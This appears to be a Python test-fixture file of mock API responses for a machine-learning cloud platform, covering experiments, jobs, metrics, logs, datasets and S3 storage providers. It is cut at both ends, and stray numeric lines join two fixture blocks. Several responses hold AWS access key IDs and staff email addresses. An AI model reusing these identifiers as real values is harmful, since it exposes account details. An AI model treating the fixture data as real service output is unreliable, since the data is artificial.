"0.00", "rateMonthly": "0.00", "label": "VIP", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": False, "numCpus": 2, "ramInBytes": "4294967296", "id": 18 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clrvkwq6l", "name": "test", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2020-03-09T17:15:08.080Z", "dtModified": "2020-03-09T17:15:08.080Z", "clusterId": 175, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] } ] } EXPERIMENTS_METRICS_GET_RESPONSE = { "handle": "ess57ozwb5ijpt", "object_type": "experiment", "charts": { "cpuPercentage": { "mljob-esro6mbmiulvbl-0-worker": [ {"time_stamp": 1587375065, "value": "0"}, {"time_stamp": 1587375095, "value": "0"}, {"time_stamp": 1587375125, "value": "0"}, {"time_stamp": 1587375155, "value": "0"}, ], "mljob-esro6mbmiulvbl-1-worker": [ {"time_stamp": 1587375065, "value": "0"}, {"time_stamp": 1587375095, "value": "0"}, {"time_stamp": 1587375125, "value": "0"}, {"time_stamp": 1587375155, "value": "0"}, ], }, "memoryUsage": { "mljob-esro6mbmiulvbl-0-worker": [ {"time_stamp": 1587375005, "value": "0"}, {"time_stamp": 1587375035, "value": "0"}, {"time_stamp": 1587375065, "value": "761856"}, {"time_stamp": 1587375095, "value": "761856"}, {"time_stamp": 1587375125, "value": "761856"}, ], "mljob-esro6mbmiulvbl-1-worker": [ {"time_stamp": 1587375005, "value": "0"}, {"time_stamp": 1587375035, "value": "0"}, {"time_stamp": 1587375065, "value": "761856"}, {"time_stamp": 1587375095, "value": "761856"}, {"time_stamp": 1587375125, "value": "761856"}, ], }, }, } EXPERIMENTS_METRICS_GET_RESPONSE_WHEN_NO_DATA_WAS_FOUND = { "handle": "ess57ozwb5ijpt", "object_type": "experiment", "charts": {}, } DEPLOYMENTS_METRICS_GET_RESPONSE = { "handle": "desgffa3mtgepvm", "object_type": "modelDeployment", "charts": { "cpuPercentage": { "desgffa3mtgepvm-0": [ {"time_stamp": 1587340800, "value": "0.0388702066666724"}, {"time_stamp": 1587370800, "value": "0.04452898888887249"}, {"time_stamp": 1587400800, "value": "0.044658617777757724"}, {"time_stamp": 1587430800, "value": "0.04922275555555997"}, {"time_stamp": 1587460800, "value": "0.0589409911111084"}, {"time_stamp": 1587490800, "value": "0.02873176888891117"}, {"time_stamp": 1587520800, "value": "0.042048226666666876"}, {"time_stamp": 1587550800, "value": "0.04952780222222625"}, ], "desgffa3mtgepvm-1": [ {"time_stamp": 1587340800, "value": "0.05044751111111307"}, {"time_stamp": 1587370800, "value": "0.04381767555555724"}, {"time_stamp": 1587400800, "value": "0.03436263111110646"}, {"time_stamp": 1587430800, "value": "0.048889264444432624"}, {"time_stamp": 1587460800, "value": "0.041525960000020255"}, {"time_stamp": 1587490800, "value": "0.04574227333332853"}, {"time_stamp": 1587520800, "value": "0.03383691777780011"}, {"time_stamp": 1587550800, "value": "0.045942304444426756"}, ], }, "memoryUsage": { "desgffa3mtgepvm-0": [ {"time_stamp": 1587340800, "value": "34910208"}, {"time_stamp": 1587370800, "value": "34910208"}, {"time_stamp": 1587400800, "value": "34914304"}, {"time_stamp": 1587430800, "value": "34914304"}, {"time_stamp": 1587460800, "value": "34914304"}, {"time_stamp": 1587490800, "value": "34914304"}, {"time_stamp": 1587520800, "value": "34914304"}, {"time_stamp": 1587550800, "value": "34914304"}, ], "desgffa3mtgepvm-1": [ {"time_stamp": 1587340800, "value": "35942400"}, {"time_stamp": 1587370800, "value": "35942400"}, {"time_stamp": 1587400800, "value": "35942400"}, {"time_stamp": 1587430800, "value": "35942400"}, {"time_stamp": 1587460800, "value": "35942400"}, {"time_stamp": 1587490800, "value": "35942400"}, {"time_stamp": 1587520800, "value": "35942400"}, {"time_stamp": 1587550800, "value": "35942400"}, ], }, }, } GET_JOB_RESPONSE = { "job": { "id": "jstkd2lapucirs", "name": "ufoym/deepo:all-py36-worker-1", "state": "Running", "workspaceUrl": "git+https://github.com/dte/stylegan.git", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "sleep 3600 ; python generate_figures.py", "projectId": "pr85u3sfa", "project": "keton", "container": "ufoym/deepo:all-py36", "containerUrl": "ufoym/deepo:all-py36", "baseContainer": "ufoym/deepo:all-py36", "baseContainerUrl": "ufoym/deepo:all-py36", "machineType": "c5.xlarge", "cluster": "KPS Jobs", "clusterId": "clqr4b0ox", "usageRate": "Employee", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2020-04-29T10:11:07.924Z", "dtModified": "2020-04-29T10:11:07.924Z", "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "exitCode": None, "queuePosition": None, "seqNum": 155, "storageRegion": "Private", "clusterMachine": None, "fqdn": "undefined.dgradient.paperspace.com", "ports": "5000:5000", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": None, "cpuCount": None, "cpuModel": None, "cpuFlags": None, "cpuMem": None, "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "aws-testing.paperspace.io", "customMetrics": None, "experimentId": "ecgrgm7ok8chv", "tags": None, }, "user": { "firstName": "first", "lastName": "last", "email": "bartosz@paperspace.com", "handle": "ukgvw4i8", }, } GET_JOB_METRICS_RESPONSE = { "handle": "jstkd2lapucirs", "object_type": "mljob", "charts": { "cpuPercentage": { "mljob-ecgrgm7ok8chv-0-worker": [ {"time_stamp": 1588155157, "value": "0"}, {"time_stamp": 1588155187, "value": "0"}, {"time_stamp": 1588155217, "value": "0"}, ], }, "memoryUsage": { "mljob-ecgrgm7ok8chv-0-worker": [ {"time_stamp": 1588155097, "value": "0"}, {"time_stamp": 1588155127, "value": "5881856"}, {"time_stamp": 1588155157, "value": "5881856"}, {"time_stamp": 1588155187, "value": "5881856"}, ], }, }, } JOBS_METRICS_GET_RESPONSE_WHEN_NO_DATA_WAS_FOUND = { "handle": "jsy5wnxbtqw1e9", "object_type": "mljob", "charts": { "cpuPercentage": None, "memoryUsage": None, }, } NOTEBOOKS_METRICS_GET_RESPONSE = { "handle": "npmnnm6e", "object_type": "notebook", "charts": { "cpuPercentage": { "npmnnm6e": [ {"time_stamp": 1587993000, "value": "0"}, {"time_stamp": 1587993030, "value": "0"}, {"time_stamp": 1587993060, "value": "0"}, {"time_stamp": 1587993090, "value": "0"}, {"time_stamp": 1587993120, "value": "0"}, {"time_stamp": 1587993150, "value": "0"}, {"time_stamp": 1587993180, "value": "0"}, {"time_stamp": 1587993210, "value": "0"}, {"time_stamp": 1587993240, "value": "0"}, {"time_stamp": 1587993270, "value": "0"}, {"time_stamp": 1587993300, "value": "0"}, {"time_stamp": 1587993330, "value": "0"}, {"time_stamp": 1587993360, "value": "0"}, ], }, "memoryUsage": { "npmnnm6e": [ {"time_stamp": 1587992970, "value": "0"}, {"time_stamp": 1587993000, "value": "782336"}, {"time_stamp": 1587993030, "value": "782336"}, {"time_stamp": 1587993060, "value": "782336"}, {"time_stamp": 1587993090, "value": "782336"}, {"time_stamp": 1587993120, "value": "782336"}, {"time_stamp": 1587993150, "value": "782336"}, {"time_stamp": 1587993180, "value": "782336"}, {"time_stamp": 1587993210, "value": "782336"}, {"time_stamp": 1587993240, "value": "782336"}, {"time_stamp": 1587993270, "value": "782336"}, {"time_stamp": 1587993300, "value": "782336"}, {"time_stamp": 1587993330, "value": "782336"}, {"time_stamp": 1587993360, "value": "782336"}, ], }, }, } NOTEBOOKS_METRICS_GET_RESPONSE_WHEN_NO_METRICS_WERE_FOUND = { "handle": "nrwed38p", "object_type": "notebook", "charts": {"cpuPercentage": None, "memoryUsage": None}, } DEPLOYMENTS_LOGS_RESPONSE = [ { "jobId": "deshj1l4nuw6sd1", "line": 1, "timestamp": "2020-05-11T11:27:56.552Z", "message": "line1\n", "instanceName": { "String": "deshj1l4nuw6sd1-1-artifact-1-5nd94", "Valid": True }, "uuid": { "String": "1ef5d86b-d05e-4610-8f81-b42b556cede7", "Valid": True }, "instanceCount": { "Int64": 1, "Valid": True } }, { "jobId": "deshj1l4nuw6sd1", "line": 2, "timestamp": "2020-05-11T11:27:56.552Z", "message": "line2\n", "instanceName": { "String": "deshj1l4nuw6sd1-1-artifact-1-5nd94", "Valid": True }, "uuid": { "String": "1ef5d86b-d05e-4610-8f81-b42b556cede7", "Valid": True }, "instanceCount": { "Int64": 1, "Valid": True } }, { "jobId": "deshj1l4nuw6sd1", "line": 3, "timestamp": "2020-05-11T11:27:56.557Z", "message": "line3", "instanceName": { "String": "deshj1l4nuw6sd1-1-artifact-1-5nd94", "Valid": True }, "uuid": { "String": "1ef5d86b-d05e-4610-8f81-b42b556cede7", "Valid": True }, "instanceCount": { "Int64": 1, "Valid": True } }, { "jobId": "deshj1l4nuw6sd1", "line": 4, "timestamp": "2020-05-11T11:27:56.558Z", "message": "PSEOF" } ] LIST_SECRETS_RESPONSE = [ { "name": "aws_access_key_id" }, { "name": "aws_secret_access_key" } ] LIST_DATASETS_RESPONSE = [ { "description": None, "dtCreated": "2020-10-09T18:34:07.097Z", "dtModified": "2020-10-09T18:34:07.097Z", "id": "dsttn2y7j1ux882", "name": "test1", "storageProvider": { "config": { "accessKey": "AKIAVWO7J5OJV4XSVOPA", "bucket": "chris-dev-cluster", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } } ] SHOW_DATASET_DETAILS_RESPONSE = { "description": None, "dtCreated": "2020-10-09T18:34:07.097Z", "dtModified": "2020-10-09T18:34:07.097Z", "id": "dsttn2y7j1ux882", "name": "test1", "storageProvider": { "config": { "accessKey": "AKIAVWO7J5OJV4XSVOPA", "bucket": "chris-dev-cluster", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } } CREATE_DATASET_RESPONSE = { "description": None, "dtCreated": "2020-10-09T18:34:07.097Z", "dtModified": "2020-10-09T18:34:07.097Z", "id": "dsttn2y7j1ux882", "name": "test1", "storageProvider": { "config": { "accessKey": "AKIAVWO7J5OJV4XSVOPA", "bucket": "chris-dev-cluster", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } } UPDATE_DATASET_RESPONSE = { "description": "Test dataset", "dtCreated": "2020-10-09T18:34:07.097Z", "dtModified": "2020-10-09T18:34:07.097Z", "id": "dsttn2y7j1ux882", "name": "test1", "storageProvider": { "config": { "accessKey": "AKIAVWO7J5OJV4XSVOPA", "bucket": "chris-dev-cluster", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } } LIST_DATASET_VERSIONS_RESPONSE = [ { "dtCreated": "2020-10-29T22:56:15.514Z", "dtModified": "2020-10-29T22:56:16.213Z", "isCommitted": True, "message": None, "tags": [ { "name": "hello" } ], "version": "1rn19s2" } ] SHOW_DATASET_VERSION_DETAILS_RESPONSE = { "dtCreated": "2020-10-29T22:56:15.514Z", "dtModified": "2020-10-29T22:56:16.213Z", "isCommitted": True, "message": None, "tags": [ { "name": "hello" } ], "version": "1rn19s2" } UPDATE_DATASET_VERSION_RESPONSE = { "dtCreated": "2020-10-29T22:56:15.514Z", "dtModified": "2020-10-29T23:27:14.955Z", "isCommitted": True, "message": "Test message", "tags": [ { "name": "hello" } ], "version": "1rn19s2" } SET_DATASET_VERSION_TAG_RESPONSE = { "dtCreated": "2020-10-29T22:57:40.723Z", "dtModified": "2020-10-29T23:48:42.948Z", "name": "hello", "version": { "message": "Test message", "version": "1rn19s2" } } LIST_STORAGE_PROVIDERS_RESPONSE = [ { "config": { "accessKey": "AKIBAEG7J3OJ24XAV33B", "bucket": "bucket", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } ] SHOW_STORAGE_PROVIDER_DETAILS_RESPONSE = { "config": { "accessKey": "AKIBAEG7J3OJ24XAV33B", "bucket": "bucket", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } CREATE_STORAGE_PROVIDER_RESPONSE = { "config": { "accessKey": "AKIBAEG7J3OJ24XAV33B", "bucket": "bucket", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test1", "type": "s3" } UPDATE_STORAGE_PROVIDER_RESPONSE = { "config": { "accessKey": "AKIBAEG7J3OJ24XAV33B", "bucket": "bucket", "secretAccessKey": "********" }, "dtCreated": "2020-10-09T18:17:34.192Z", "dtModified": "2020-10-09T18:29:22.368Z", "id": "spltautet072md4", "name": "test2", "type": "s3" }
40.738141
570
0.435959
LIST_OF_EXPERIMENTS_RESPONSE_JSON = { "data": [ { "dtCreated": "2019-03-21T07:47:05.616096+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-21T07:47:05.616096+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 6315, "experimentTemplateId": 60, "experimentTypeId": 1, "handle": "ea2lfbbpdyzsq", "id": 6292, "projectHandle": "prq70zy79", "projectId": 612, "started_by_user_id": 1, "state": 1, "templateHistory": { "dtCreated": "2019-03-21T07:47:04.925852+00:00", "dtDeleted": None, "experimentTemplateId": 60, "id": 6315, "params": { "experimentTypeId": 1, "name": "dsfads", "ports": 5000, "project_handle": "prq70zy79", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "sadas" }, "triggerEvent": None, "triggerEventId": None }, "datasets": [ { "uri": "s3://some/dataset", "volume_options": { "kind": "dynamic", "size": "10Gi", }, }, ], }, { "dtCreated": "2019-03-21T07:46:57.706055+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-21T07:46:57.706055+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 6314, "experimentTemplateId": 60, "experimentTypeId": 1, "handle": "em6btk2vtb7it", "id": 6291, "projectHandle": "prq70zy79", "projectId": 612, "started_by_user_id": 1, "state": 1, "templateHistory": { "dtCreated": "2019-03-21T07:46:56.949590+00:00", "dtDeleted": None, "experimentTemplateId": 60, "id": 6314, "params": { "experimentTypeId": 1, "name": "dsfads", "ports": 5000, "project_handle": "prq70zy79", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "sadas" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-20T19:56:50.154853+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-20T19:56:50.154853+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 6297, "experimentTemplateId": 60, "experimentTypeId": 3, "handle": "ew69ls0vy3eto", "id": 6286, "projectHandle": "prq70zy79", "projectId": 612, "started_by_user_id": 1, "state": 1, "templateHistory": { "dtCreated": "2019-03-20T19:56:49.427354+00:00", "dtDeleted": None, "experimentTemplateId": 60, "id": 6297, "params": { "artifactDirectory": "/artdir", "clusterId": 2, "experimentEnv": { "key": "val" }, "experimentTypeId": 3, "name": "multinode_mpi", "parameter_server_command": "ls", "parameter_server_container": "pscon", "parameter_server_container_user": "pscuser", "parameter_server_count": 2, "parameter_server_machine_type": "psmtype", "parameter_server_registry_password": "psrpass", "parameter_server_registry_username": "psrcus", "ports": 3456, "project_handle": "prq70zy79", "project_id": 34, "trigger_event_id": 12, "worker_command": "wcom", "worker_container": "wcon", "worker_container_user": "usr", "worker_count": 2, "worker_machine_type": "mty", "worker_registry_password": "rpass", "worker_registry_username": "rusr", "workingDirectory": "/dir", "workspaceUrl": "wurl" }, "triggerEvent": { "dtCreated": "2019-03-11T14:47:57+00:00", "eventData": { "author": { "email": "bluckey@paperspace.com", "login": "ultrabluewolf", "name": "Britney Luckey" }, "branch": "feature/test-1", "message": "Update readme #2", "repo_node_id": "MDEwOlJlcG9zaXRvcnkxNzQ3MjI3NDc=", "sender": { "id": 4633049, "login": "ultrabluewolf" }, "sha": "daa117a00cd1e0e9b1b55695031e698a560cca29", "timestamp": "2019-03-11T10:47:57-04:00" }, "id": 12, "type": "github" }, "triggerEventId": 12 } } ], "message": "success", "meta": { "filter": [], "limit": 11, "offset": 0, "totalItems": 27 } } LIST_OF_EXPERIMENTS_FILTERED_WITH_TWO_PROJECTS = { "data": [ { "data": [ { "dtCreated": "2019-03-21T08:48:49.449397+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-21T08:48:49.449397+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": "Expecting value: line 1 column 1 (char 0)", "experimentTemplateHistoryId": 297, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "esj8mcpaayh5kx", "id": 295, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 1, "state": 7, "templateHistory": { "dtCreated": "2019-03-21T08:48:48.436994+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 297, "params": { "artifactDirectory": "sagdf", "clusterId": 342, "experimentEnv": { "k": "v" }, "experimentTypeId": 1, "name": "dsfads", "ports": 3245, "project_handle": "pr4yxj956", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "C2", "workingDirectory": "sadfas", "workspaceUrl": "sadfds" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-21T08:48:29.553574+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-21T08:48:29.553574+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": "{'name': 'Error', 'status': 400, 'message': 'Invalid machine type'}", "experimentTemplateHistoryId": 296, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "estun7jhqta8sm", "id": 294, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 1, "state": 7, "templateHistory": { "dtCreated": "2019-03-21T08:48:28.467167+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 296, "params": { "artifactDirectory": "sagdf", "clusterId": 342, "experimentEnv": { "k": "v" }, "experimentTypeId": 1, "name": "dsfads", "ports": 3245, "project_handle": "pr4yxj956", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "c2", "workingDirectory": "sadfas", "workspaceUrl": "sadfds" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-21T08:44:42.581919+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-21T08:44:42.581919+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": "{'name': 'Error', 'status': 400, 'message': 'Invalid machine type'}", "experimentTemplateHistoryId": 295, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "es08mwh7ye6zpm", "id": 293, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 1, "state": 7, "templateHistory": { "dtCreated": "2019-03-21T08:44:41.366528+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 295, "params": { "artifactDirectory": "sagdf", "clusterId": 342, "experimentEnv": { "k": "v" }, "experimentTypeId": 1, "name": "dsfads", "ports": 3245, "project_handle": "pr4yxj956", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "sadas", "workingDirectory": "sadfas", "workspaceUrl": "sadfds" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-19T16:35:28.425184+00:00", "dtDeleted": None, "dtFinished": "2019-03-19T16:38:40.664560+00:00", "dtModified": "2019-03-19T16:35:28.425184+00:00", "dtProvisioningFinished": "2019-03-19T16:37:37.516138+00:00", "dtProvisioningStarted": "2019-03-19T16:37:37.516138+00:00", "dtStarted": "2019-03-19T16:37:37.516138+00:00", "dtTeardownFinished": "2019-03-19T16:38:40.664560+00:00", "dtTeardownStarted": "2019-03-19T16:38:40.664560+00:00", "experimentError": None, "experimentTemplateHistoryId": 38, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "eshdufkt9ti8mx", "id": 38, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-19T16:35:28.425184+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 38, "params": { "command": "python2 hello.py", "container": "paperspace/tensorflow-python", "project": "paperspace-python", "workspaceFileName": "hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-19T14:52:42.476592+00:00", "dtDeleted": None, "dtFinished": "2019-03-19T14:53:00.850701+00:00", "dtModified": "2019-03-19T14:52:42.476592+00:00", "dtProvisioningFinished": "2019-03-19T14:52:46.844619+00:00", "dtProvisioningStarted": "2019-03-19T14:52:46.844619+00:00", "dtStarted": "2019-03-19T14:52:46.844619+00:00", "dtTeardownFinished": "2019-03-19T14:53:00.850701+00:00", "dtTeardownStarted": "2019-03-19T14:53:00.850701+00:00", "experimentError": None, "experimentTemplateHistoryId": 34, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "e07h0ym8fewm", "id": 34, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-19T14:52:42.476592+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 34, "params": { "command": "python2 hello.py", "container": "paperspace/tensorflow-python", "project": "paperspace-python", "workspaceFileName": "hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-19T14:46:21.605202+00:00", "dtDeleted": None, "dtFinished": "2019-03-19T14:46:40.360111+00:00", "dtModified": "2019-03-19T14:46:21.605202+00:00", "dtProvisioningFinished": "2019-03-19T14:46:26.094384+00:00", "dtProvisioningStarted": "2019-03-19T14:46:26.094384+00:00", "dtStarted": "2019-03-19T14:46:26.094384+00:00", "dtTeardownFinished": "2019-03-19T14:46:40.360111+00:00", "dtTeardownStarted": "2019-03-19T14:46:40.360111+00:00", "experimentError": None, "experimentTemplateHistoryId": 33, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "e0fq31vyla039", "id": 33, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-19T14:46:21.605202+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 33, "params": { "command": "python3 hello.py", "container": "paperspace/tensorflow-python", "project": "paperspace-python", "workspaceFileName": "hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-19T14:38:38.227536+00:00", "dtDeleted": None, "dtFinished": "2019-03-19T14:42:41.723400+00:00", "dtModified": "2019-03-19T14:38:38.227536+00:00", "dtProvisioningFinished": "2019-03-19T14:41:34.630690+00:00", "dtProvisioningStarted": "2019-03-19T14:41:34.630690+00:00", "dtStarted": "2019-03-19T14:41:34.630690+00:00", "dtTeardownFinished": "2019-03-19T14:42:41.723400+00:00", "dtTeardownStarted": "2019-03-19T14:42:41.723400+00:00", "experimentError": None, "experimentTemplateHistoryId": 32, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "esxz3ihfl9qxs2", "id": 32, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-19T14:38:38.227536+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 32, "params": { "command": "python3 hello.py", "container": "paperspace/tensorflow-python", "project": "paperspace-python", "workspaceFileName": "hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-14T14:06:27.383232+00:00", "dtDeleted": None, "dtFinished": "2019-03-14T14:10:05.315380+00:00", "dtModified": "2019-03-14T14:06:27.383232+00:00", "dtProvisioningFinished": "2019-03-14T14:10:00.097887+00:00", "dtProvisioningStarted": "2019-03-14T14:09:02.736309+00:00", "dtStarted": "2019-03-14T14:10:00.097887+00:00", "dtTeardownFinished": "2019-03-14T14:10:05.809122+00:00", "dtTeardownStarted": "2019-03-14T14:10:05.462304+00:00", "experimentError": None, "experimentTemplateHistoryId": 32862, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "ecqq0rz0gok9i", "id": 32860, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 32862, "params": { "clusterId": "clmtkpnm2", "command": "python3 hello.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "K80", "name": "job 5", "projectId": "pr4yxj956", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr4yxj956/jw276004uoaiv/hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-14T11:22:14.345466+00:00", "dtDeleted": None, "dtFinished": "2019-03-14T11:23:17.763554+00:00", "dtModified": "2019-03-14T11:22:14.345466+00:00", "dtProvisioningFinished": "2019-03-14T11:23:12.549387+00:00", "dtProvisioningStarted": "2019-03-14T11:22:18.820247+00:00", "dtStarted": "2019-03-14T11:23:12.549387+00:00", "dtTeardownFinished": "2019-03-14T11:23:18.063367+00:00", "dtTeardownStarted": "2019-03-14T11:23:17.900575+00:00", "experimentError": None, "experimentTemplateHistoryId": 32859, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "es310784c1o1x6", "id": 32857, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 32859, "params": { "clusterId": "clmtkpnm2", "command": "python3 hello.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "K80", "name": "job 4", "projectId": "pr4yxj956", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr4yxj956/jpngp435ekbp9/hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-09T11:05:34.409959+00:00", "dtDeleted": None, "dtFinished": "2019-03-09T11:09:38.903533+00:00", "dtModified": "2019-03-09T11:05:34.409959+00:00", "dtProvisioningFinished": "2019-03-09T11:09:33.686660+00:00", "dtProvisioningStarted": "2019-03-09T11:08:34.681334+00:00", "dtStarted": "2019-03-09T11:09:33.686660+00:00", "dtTeardownFinished": "2019-03-09T11:09:39.194718+00:00", "dtTeardownStarted": "2019-03-09T11:09:39.036278+00:00", "experimentError": None, "experimentTemplateHistoryId": 32351, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "esabwtehoekn6w", "id": 32349, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 32351, "params": { "clusterId": "clmtkpnm2", "command": "python3 hello.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "K80", "name": "job 3", "projectId": "pr4yxj956", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr4yxj956/jafb4f2w30afo/hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-06T13:56:55.165302+00:00", "dtDeleted": None, "dtFinished": "2019-03-06T13:57:13.165854+00:00", "dtModified": "2019-03-06T13:56:55.165302+00:00", "dtProvisioningFinished": "2019-03-06T13:57:07.955608+00:00", "dtProvisioningStarted": "2019-03-06T13:57:00.905506+00:00", "dtStarted": "2019-03-06T13:57:07.955608+00:00", "dtTeardownFinished": "2019-03-06T13:57:13.454509+00:00", "dtTeardownStarted": "2019-03-06T13:57:13.299681+00:00", "experimentError": None, "experimentTemplateHistoryId": 31991, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "ea1d6t082wq7i", "id": 31989, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 31991, "params": { "clusterId": "clmtkpnm2", "command": "python3 hello.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "K80", "name": "job 2", "projectId": "pr4yxj956", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr4yxj956/jst4l3hoi0hcyn/hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { 